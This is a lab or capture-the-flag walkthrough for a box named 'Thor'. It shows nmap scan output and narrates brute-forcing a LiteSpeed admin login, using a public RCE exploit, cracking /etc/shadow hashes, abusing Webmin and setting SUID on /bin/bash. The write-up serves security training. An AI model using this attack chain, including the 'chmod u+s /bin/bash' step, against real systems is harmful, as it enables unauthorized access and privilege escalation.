Thor

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 -Pn 192.168.201.208
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 11:13 +08
Nmap scan report for 192.168.201.208
Host is up (0.17s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
7080/tcp  open  empowerid
10000/tcp open  snet-sensor-mgmt

Did a detailed scan on the open web ports.

$ sudo nmap -p 80,7080,10000 -sC -sV --min-rate 3000 -Pn 192.168.201.208
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 11:16 +08
Nmap scan report for 192.168.201.208
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          LiteSpeed
|_http-server-header: LiteSpeed
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 200 OK
|     etag: "85e2-604fc846-26fe7;;;"
|     last-modified: Mon, 15 Mar 2021 20:49:10 GMT
|     content-type: text/html
|     content-length: 34274
|     accept-ranges: bytes
|     date: Sat, 15 Jul 2023 03:16:12 GMT
|     server: LiteSpeed
|     connection: close
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <!--====== Required meta tags ======-->
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <!--====== Title ======-->
|     <title>Jane Foster - Personal Portfolio</title>
|     <!--====== Favicon Icon ======-->
|     <link rel="shortcut icon" href="assets/images/favicon.png" type="image/png">
|     <!--====== Bootstrap css ======-->
|     <link rel="stylesheet" href="assets/css/bootstrap.min.css">
|     <!--====== Line Icons css ======-->
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     etag: "85e2-604fc846-26fe7;;;"
|     last-modified: Mon, 15 Mar 2021 20:49:10 GMT
|     content-type: text/html
|     content-length: 34274
|     accept-ranges: bytes
|     date: Sat, 15 Jul 2023 03:16:13 GMT
|     server: LiteSpeed
|     connection: close
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <!--====== Required meta tags ======-->
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <!--====== Title ======-->
|     <title>Jane Foster - Personal Portfolio</title>
|     <!--====== Favicon Icon ======-->
|     <link rel="shortcut icon" href="assets/images/favicon.png" type="image/png">
|     <!--====== Bootstrap css ======-->
|     <link rel="stylesheet" href="assets/css/bootstrap.min.css">
|_    <!--====== Line Icons css ======-->
|_http-title: Jane Foster - Personal Portfolio
7080/tcp  open  ssl/empowerid LiteSpeed
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
| ssl-cert: Subject: commonName=ubuntu/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2022-06-07T09:39:58
|_Not valid after:  2024-09-04T09:39:58
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 302 Found
|     x-powered-by: PHP/5.6.36
|     x-frame-options: SAMEORIGIN
|     x-xss-protection: 1;mode=block
|     referrer-policy: same-origin
|     x-content-type-options: nosniff
|     set-cookie: LSUI37FE0C43B84483E0=6bde28c9fc90fbd8dbd0956db348c0f6; path=/; secure; HttpOnly
|     expires: Thu, 19 Nov 1981 08:52:00 GMT
|     cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|     pragma: no-cache
|     set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     location: /login.php
|     content-type: text/html; charset=UTF-8
|     content-length: 0
|     date: Sat, 15 Jul 2023 03:16:30 GMT
|     server: LiteSpeed
|     alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
|   HTTPOptions: 
|     HTTP/1.0 302 Found
|     x-powered-by: PHP/5.6.36
|     x-frame-options: SAMEORIGIN
|     x-xss-protection: 1;mode=block
|     referrer-policy: same-origin
|     x-content-type-options: nosniff
|     set-cookie: LSUI37FE0C43B84483E0=58c6a8490e64410d0e090353ed826ba0; path=/; secure; HttpOnly
|     expires: Thu, 19 Nov 1981 08:52:00 GMT
|     cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|     pragma: no-cache
|     set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     location: /login.php
|     content-type: text/html; charset=UTF-8
|     content-length: 0
|     date: Sat, 15 Jul 2023 03:16:31 GMT
|     server: LiteSpeed
|_    alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
| http-title: LiteSpeed WebAdmin Console
|_Requested resource was /login.php
|_http-server-header: LiteSpeed
10000/tcp open  http          MiniServ 1.962 (Webmin httpd)
|_http-server-header: MiniServ/1.962
|_http-title: Site doesn't have a title (text/html; Charset=utf-8).

Wordlist + Brute Force -> Creds + RCE

Port 80 hosted a portfolio page for Jane Foster:

At the bottom of the page, there was some contact details:

The box was named Thor, so it makes sense that there would be something 'Thor' related. From the earlier nmap scan, we know that port 80 is running using Litespeed. Port 7080 is the LiteSpeed admin console, likely operated by this Jane Foster.

Port 7080 reveals a login page:

There are some exploits available for this:

One of which is an RCE exploit, but it requires credentials. Weak credentials don't work here, so we need to get crafty. We know that 'Jane Foster' is the one operating this webpage. So let's create a custom wordlist present.

I tried to use Hydra to brute force this, but it didn't work either. I took a hint and it told me to keep brute forcing, so in this case we can try the permutation of words within our wordlist file.

This would combine two of the words together. Then, we can brute force again with Hydra.

This would find the correct password. We can then use the RCE exploit:

Privilege Escalation

Shadow Group -> Thor Creds

We are part of the shadow group, meaning we can read /etc/shadow:

We can try to crack the hashes alone using john for these users. The hash for thor can be cracked while the one for root cannot.

We can then ssh in as thor:

Sudo Webmin -> Webmin RCE

thor can restart the Webmin instance as root:

I almost forgot there was a Webmin instance.

Using our access, we can actually reset the Webmin password.

Logo[How To] reset Webmin password | Linux/Unix ConfigurationLinux/Unix Configuration

However, it appears that only the bin group has access to the /etc/webmin group:

Earlier, the RCE exploit for OpenLiteSpeed required us to specify a GroupID, of which I specified shadow as the default. We can try specifying bin and using that shell to reset the password.

Then we can reset the password and restart Webmin as thor:

Using this, we can login to Webmin and view the dashboard:

Within Webmin, there's a >_ option, which spawns a command line instance within the browser:

We can just do chmod u+s /bin/bash, and get a proper root shell using ssh.

PreviousTicoNextTwiggy

Last updated